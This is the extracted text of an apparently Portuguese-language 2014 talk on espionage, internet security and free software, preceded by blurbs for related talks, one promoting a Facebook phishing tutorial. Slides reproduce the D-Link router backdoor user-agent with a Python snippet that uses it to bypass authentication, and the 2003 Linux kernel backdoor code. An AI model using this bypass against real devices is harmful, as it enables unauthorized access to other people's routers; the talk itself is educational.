O documento discute tópicos relacionados à espionagem e segurança na internet, incluindo acesso seguro através da internet usando o protocolo SSL, hackers versus crackers, técnicas para quebrar senhas, vazamento de senhas no LinkedIn, engenharia reversa em firmware da D-Link e o Marco Civil da Internet no Brasil.
Palestra atualizada (Ago/2013): "Hackerspaces e cultura Hacker", apresentada no congresso SecureBrasil 2013. O que são os hackers? O que são os hackerspaces? (versão Power Point)
O mundo mudou a partir das revelações do Snowden. Mostraremos como o NSA e seus aliados violam nossa privacidade, quanto investem, alguns recursos que usam e o que nós podemos fazer para dificultar ou pelo menos encarecer o que o NSA faz através do uso de criptografia, da navegação de forma anônima ou mesmo não usar a internet para transferir documentos importantes.
Anchises Moraes (Garoa Hacker Clube, CSA, Security Bsides)
Luca Bastos (ThoughtWorks)
Palestra apresentada no Dia D 2009 da comunidade Debian-PE.
Fizemos uma breve contextualização e discutimos algumas novidades da versão 5.3.0 como:
namespaces
late static bindings
lambda functions
closures, etc
Slide da disciplina de linguagem de programação para a web do curso técnico em informática do IFPE - Campus Garanhuns. Faz uma apresentação sobre o que é o CSS, por que o utilizamos, suas vantagens, como o utilizamos e algumas de suas propriedades.
Palestra atualizada (Ago/2013): "Hackerspaces e cultura Hacker", apresentada no congresso SecureBrasil 2013. O que são os hackers? O que são os hackerspaces? (versão Power Point)
O mundo mudou a partir das revelações do Snowden. Mostraremos como o NSA e seus aliados violam nossa privacidade, quanto investem, alguns recursos que usam e o que nós podemos fazer para dificultar ou pelo menos encarecer o que o NSA faz através do uso de criptografia, da navegação de forma anônima ou mesmo não usar a internet para transferir documentos importantes.
Anchises Moraes (Garoa Hacker Clube, CSA, Security Bsides)
Luca Bastos (ThoughtWorks)
Palestra apresentada no Dia D 2009 da comunidade Debian-PE.
Fizemos uma breve contextualização e discutimos algumas novidades da versão 5.3.0 como:
namespaces
late static bindings
lambda functions
closures, etc
Slide da disciplina de linguagem de programação para a web do curso técnico em informática do IFPE - Campus Garanhuns. Faz uma apresentação sobre o que é o CSS, por que o utilizamos, suas vantagens, como o utilizamos e algumas de suas propriedades.
JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...Felipe de Albuquerque
Apresentação produzida para a palestra na Campus Party Recife 2015, é uma apresentação introdutória sobre minha experiência com o JavaScript Robotics, e aborda temas como NodeBots, Johnny-five.io entre outras coisas. O link do vídeo no youtube é: https://youtu.be/NqHgluejYMc?t=5m3s
Apresentação sobre CSS que mostra técnicas antigas de desenvolvimento, novas funcionalidade da versão CSS3, lidando com navegadores antigos e sem suporte, exemplos de algumas ferramentas úteis.
Apresentação feita para o treinamento dos colaboradores da Vitrio.
Público alvo do treinamento: Analistas de conteúdo, Designers e equipe de Marketing Digital.
O principal assunto era uma breve introdução ao JavaScript ,jQuery e plugins. Entretanto, abrangemos outros tópicos, tais como: Desenvolvimento em Camadas, requisições, performance de web sites e algumas ferramentas.
JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...Felipe de Albuquerque
Apresentação produzida para a palestra na Campus Party Recife 2015, é uma apresentação introdutória sobre minha experiência com o JavaScript Robotics, e aborda temas como NodeBots, Johnny-five.io entre outras coisas. O link do vídeo no youtube é: https://youtu.be/NqHgluejYMc?t=5m3s
Apresentação sobre CSS que mostra técnicas antigas de desenvolvimento, novas funcionalidade da versão CSS3, lidando com navegadores antigos e sem suporte, exemplos de algumas ferramentas úteis.
Apresentação feita para o treinamento dos colaboradores da Vitrio.
Público alvo do treinamento: Analistas de conteúdo, Designers e equipe de Marketing Digital.
O principal assunto era uma breve introdução ao JavaScript ,jQuery e plugins. Entretanto, abrangemos outros tópicos, tais como: Desenvolvimento em Camadas, requisições, performance de web sites e algumas ferramentas.
A palestra comenta desde problemas básicos a avançados discutindo conceitos de informação e segurança da informação para identificar pessoas envolvidas na tarefa de segurança de um sistemas Web, Também descreve como podemos evitar com que sistemas PHPs sejam invadidos e estejam sempre disponíveis para atender a usuários humanos.
Este trabalho visa demonstrar algumas técnicas e ferramentas para navegação em
anonimato na Web, ficar anônimo é ter sua identidade escondida de terceiros.
Phishing - CAPTURANDO SENHAS DO FACEBOOK COM O XPLOITV.NETRicardo Ferreira
As redes sociais mudaram, e permanecem mudando, o formato da comunicação.
Em busca de informações, “Hackers” e Programadores desenvolvem falhas (exploits) para que pessoas comuns (sim, pessoas comuns, assim como eu e você) possam ter acessos não autorizados a logins, senhas e IPs de usuários. O Facebook é um das principais redes sociais mais utilizadas da nossa atualidade, e diariamente, vem sofrendo vários ataques desse tipo. Este artigo científico ensinará umas dessas falhas e o impacto que ela poderá trazer ao usuário invadido. Será que estamos totalmente seguros? É o que veremos nos próximos capítulos.
Todo conteúdo aqui contido tem como principal objetivo ensinar, e não nos responsabilizamos por seus atos!
Ebook com tudo que você precisa saber sobre segurança na internet, nele você vai ficar por dentro do conceito de Hacker e Cracker,Tipos de ataques,Spywares, paginas fake, o que fazer com um computador infectado, tipos de virus e muito mais.
lembrando que esta é uma previa, o curso completo com mais apostilas e video aulas, professores online, e certifificado entregue em casa, basta acessar http://preciosoclique.blogspot.com e escolher seu curso.
Software Livre está presente há 30 anos e já deixou de ser apenas uma Filosofia que unia pequenas comunidades de desenvolvedores para ser ferramenta de alta qualidade para o mercado de trabalho. Nessa palestra vamos falar sobre:
Iniciar uma empresa
Mercado de trabalho
Software Livre saindo das empresas
Contribuindo com Software Livre
1. Espionagem e Software Livre
Endagamentos e conclus˜oes
´Atila Camurc¸a
September 13, 2014
2. Sumary
1 Introduc¸˜ao
2 Acesso seguro atrav´es da internet
3 Hackers e Crackers
Hackeando Google e Duck Duck Go
T´ecnicas para quebrar senhas
Vazamento de senhas ao Linkedin
Engenharia reversa em firmware D-Link
Ataque ao Kernel
4 Marco Civil da Internet no Brasil
3. Sobre Mim
Graduando em Ciˆencia da Computac¸˜ao pelo IFCE.
7 anos de experiˆencia com Linux.
Organizador do COMSOLiD a 6 anos.
6. Acesso seguro atrav´es da internet
Para acessar a internet com seguranc¸a usamos o protocolo SSL junto
com o HTTP.
Figure : SSL do Gmail
7. Acesso seguro atrav´es da internet
SSL ´e uma nova camada de protocolo que opera em cima do protocolo
TCP.
Permite ambas as m´aquina, cliente e servidor, estabelecer uma conex˜ao
criptografada.
8. Acesso seguro atrav´es da internet
Entretanto isso ´e uma especificac¸˜ao, ou seja, algu´em tem que
implementar. Algumas empresas que o implementam:
OpenSSL (http://www.openssl.org/) - Implementac¸˜ao livre e
gratuita do SSL.
Apache-SSL (http://www.apache-ssl.org/) - um servidor web
seguro, baseado no OpenSSL.
SSLeay
(ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/)
- uma implementac¸˜ao gratuita do Netscape’s Secure Socket Layer.
Planet SSL (http:
//www.rsasecurity.com/standards/ssl/developers.html) -
provˆe SSL para programas em C e Java.
9. Acesso seguro atrav´es da internet
Exemplo de mesma implementac¸˜ao para problemas diferentes:
multiplicac¸˜ao de 2 n´umeros:
2 * 3
ou
2 + 2 + 2
13. O qu˜ao ´e seguro uma
criptografia usando SSL?
14. Levaria um tempo
significativamente maior que a
idade do universo para quebrar
uma chave de 128-bits.
Estima-se um pouco mais de 13 bilh˜oes de anos.
Fonte: http://www.inet2000.com/public/encryption.htm
http://www.digicert.com/TimeTravel/math.htm
16. Hackers e Crackers
Crackers s˜ao pessoas que invadem computadores com prop´ositos
criminais ou ganho pessoal.
Enquanto Hackers podem ser especialistas em seguranc¸a contratados
por empresas, com o objetivo de encontrar poss´ıveis vulnerabilidades e
san´a-las.
17. Hackeando Google
Hackear ´e uma coisa boa! Alguns sites permitem que isso seja feito de
forma a otimizar processos, como fazer uma busca. Vejamos um
exemplo com o Google quando fazemos a seguinte busca:
comsolid filetype:pdf
Al´em de buscar a palavra comsolid, ele busca apenas arquivos pdf.
18. Hackeando Google
Ou ainda podemos fazer buscas em determinados sites somente. Basta
fazer uma busca na forma:
inkscape site:comsolid.org
Essa busca pesquisa a palavra inkscape no site comsolid.org
19. Hackeando Duck Duck Go
Duck Duck Go ´e um motor de busca preocupado com a pesquisa em si
e sua privacidade.
https://duckduckgo.com/
Possui parte de seu c´odigo livre, isso inclui plugins, add-ons, etc. P´agina
do github:
https://github.com/duckduckgo/
20. Hackeando Duck Duck Go
Duck Duck Go permite hacks mais engenhosos. Vamos a eles:
!g comsolid - busca comsolid no google
expand http://va.mu/dIwg - mostra a URL original
ip address - mostra seu enderec¸o IP
github sige - mostra reposit´orios do github
@comsolid - mostra usu´ario do Twitter
age of linus torvalds - diz a idade
define free software - define uma palavra ou frase
weather in fortaleza - mostra a previs˜ao do tempo
daft punk soundcloud - busca m´usicas no soundcloud
21. Hackeando Duck Duck Go
Temos ainda o http://duckduckhack.com/
Figure : Duck Duck Hack
23. T´ecnicas para quebrar senhas
A t´ecnica mais conhecida e natural ´e a forc¸a bruta, ou seja, tentar todas
as combinac¸˜oes poss´ıveis at´e encontrar. Isso funciona at´e certo ponto,
quando a entrada ´e pequena.
Num artigo escrito por Dan Goodin no site http://arstechnica.com
em que descreve como Kevin Young, um pesquisador de seguranc¸a de
senhas, procedeu para descriptografar senhas vazadas pelo Antisec de
uma empresa chamada Stratfor.
24. T´ecnicas para quebrar senhas
Ap´os quebrar 60% das senhas usando listas de senhas dispon´ıveis em:
Hashcat - http://hashcat.net/oclhashcat-plus/
John the Ripper - http://www.openwall.com/john/
Para os outros 40% ele ficou “sem palavras”, ent˜ao onde encontr´a-las?
Que tal Wikipedia, Youtube, B´ıblia, Projeto Gutenberg?
25. T´ecnicas para quebrar senhas
Uma das senhas era “crotalus atrox”, nome cient´ıfico de uma cobra. Tal
senha foi quebrada grac¸as a esta p´agina da Wikipedia:
https://en.wikipedia.org/wiki/Crotalus_atrox
Em seguida outras senhas fortes por serem grandes foram encontradas
como:
“from genesis to revelations” (26)
“I cant remember anything” (24)
“thereisnofatebutwhatwemake” (26)
“givemelibertyorgivemedeath” (26)
26. Vazamento de senhas ao Linkedin
Em Junho de 2012 um usu´ario anˆonimo postou no site
http://insidepro.com/ uma lista com 6.5 milh˜oes de hashs ´unicos
referentes a senhas pedindo ajuda para recuper´a-las.
Ap´os quebrar muitas das senhas descobriu-se que se tratava de um banco
de senhas do site Linkedin. Essa descoberta foi poss´ıvel pelo n´umero de
senhas com a palavra linkedin.
27. Vazamento de senhas ao Linkedin
Na lista existiam:
1 - linkedin (4408)
2 - link (2638)
3 - linked (2135)
Outras senhas encontradas:
8 - love (1018)
11 - password (856)
16 - abc (750)
Mais informac¸˜oes em: http:
//www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf
28. Engenharia reversa em firmware D-Link
Todos sabemos que a D-Link ´e especializada em fazer roteadores, e eles
s˜ao um bom local para backdoors. E isso foi exatamente que Craig
Heffner autor no blog http://www.devttys0.com encontrou.
Ele encontrou a partir de uma engenharia reversa no firmware de uma
dos roteadores.
29. Engenharia reversa em firmware D-Link
Ap´os notar que certa func¸˜ao chamada alpha auth check soava
suspeita, ele foi saber o que exatamente ela fazia. Ap´os um tempo ele
chegou no seguinte trecho de c´odigo:
int alpha_auth_check(struct http_request_t *request) {
if(strstr(request->url, "graphic/") ||
strstr(request->url, "public/") ||
strcmp(request->user_agent,
"xmlset_roodkcableoj28840ybtide") == 0) {
return AUTH_OK;
} else {
if(check_login(request->0xC, request->0xE0) != 0) {
return AUTH_OK;
}
}
return AUTH_FAIL;
}
30. Engenharia reversa em firmware D-Link
Baseado no c´odigo fonte das p´aginas HTML e outros detalhes ´e sensato
concluir que os seguintes modelos s˜ao afetados:
DIR-100
DIR-120
DI-624S
DI-524UP
DI-604S
DI-604UP
DI-604+
TM-G5240
31. Engenharia reversa em firmware D-Link
Quem quiser fazer um teste real existe um c´odigo em Python escrito pelo
pr´oprio Craig e pode ser encontrado em:
http://pastebin.com/vbiG42VD
# Normally only admins can access the tools_misc.xgi page;
# use the backdoor user-agent to bypass authentication
import urllib2
# ...
req = urllib2.Request(url+buf,
headers={
’User-Agent’: ’xmlset_roodkcableoj28840ybtide’
})
urllib2.urlopen(req)
33. Ataque ao Kernel
http://linux.slashdot.org/story/13/10/09/1551240/
the-linux-backdoor-attempt-of-2003
Em 2003, houve uma tentativa de backdoor no Kernel do Linux.
/* ... */
if ((options == (__WCLONE|__WALL))
&& (current->uid = 0))
retval = -EINVAL;
/* ... */
Bastava chamar a func¸˜ao wait4 e vocˆe viraria root.
34. Ataque ao Kernel
Comparemos os c´odigos original e o backdoor, e vejam se encontram a
diferenc¸a.
/* ... */
if ((options == (__WCLONE|__WALL))
&& (current->uid == 0))
retval = -EINVAL;
/* ... */
/* ... */
if ((options == (__WCLONE|__WALL))
&& (current->uid = 0))
retval = -EINVAL;
/* ... */
35. Marco Civil da Internet no Brasil
O que ´e Marco Civil?
´E
um projeto de Lei que visa estabelecer direitos e deveres na utilizac¸˜ao
da Internet no Brasil. ´E
a constituic¸˜ao da Internet no pa´ıs.
36. Quais s˜ao os direitos e deveres?
Neutralidade: pro´ıbe que provedores de internet discriminem certos
servic¸os em detrimento de outros.
Armazenamento de dados: Operac¸˜ao de coleta de dados no Brasil
deve respeitar a privacidade, protec¸˜ao dos dados e sigilo das
comunicac¸˜oes privadas.
Retirada de conte´udo: entidades que oferecem conte´udo e
aplicac¸˜oes s´o ser˜ao responsabilizadas por danos gerados por terceiros
se n˜ao acatarem ordem judicial exigindo a retirada dessas
publicac¸˜oes.
37. Quais s˜ao os direitos e deveres?
Fim do marketing dirigido: as empresas de acesso n˜ao poder˜ao
“espiar” o conte´udo das informac¸˜oes trocadas pelos usu´arios na
rede. H´a interesse em fazer isso com fins comerciais, como para
publicidade.
Sigilo e privacidade: Provedores de acesso `a internet ser˜ao
obrigados a guardar os registros das horas de acesso e do fim da
conex˜ao dos usu´arios pelo prazo de seis meses, mas isso deve ser
feito em ambiente controlado.
Para mais detalhes:
http://www.molon1313.com.br/marco-civil-da-internet/
38. Onde encontrar essa palestra?
Vocˆe pode baixar essa palestra e ainda outras em:
http://sige.comsolid.org/u/atilacamurca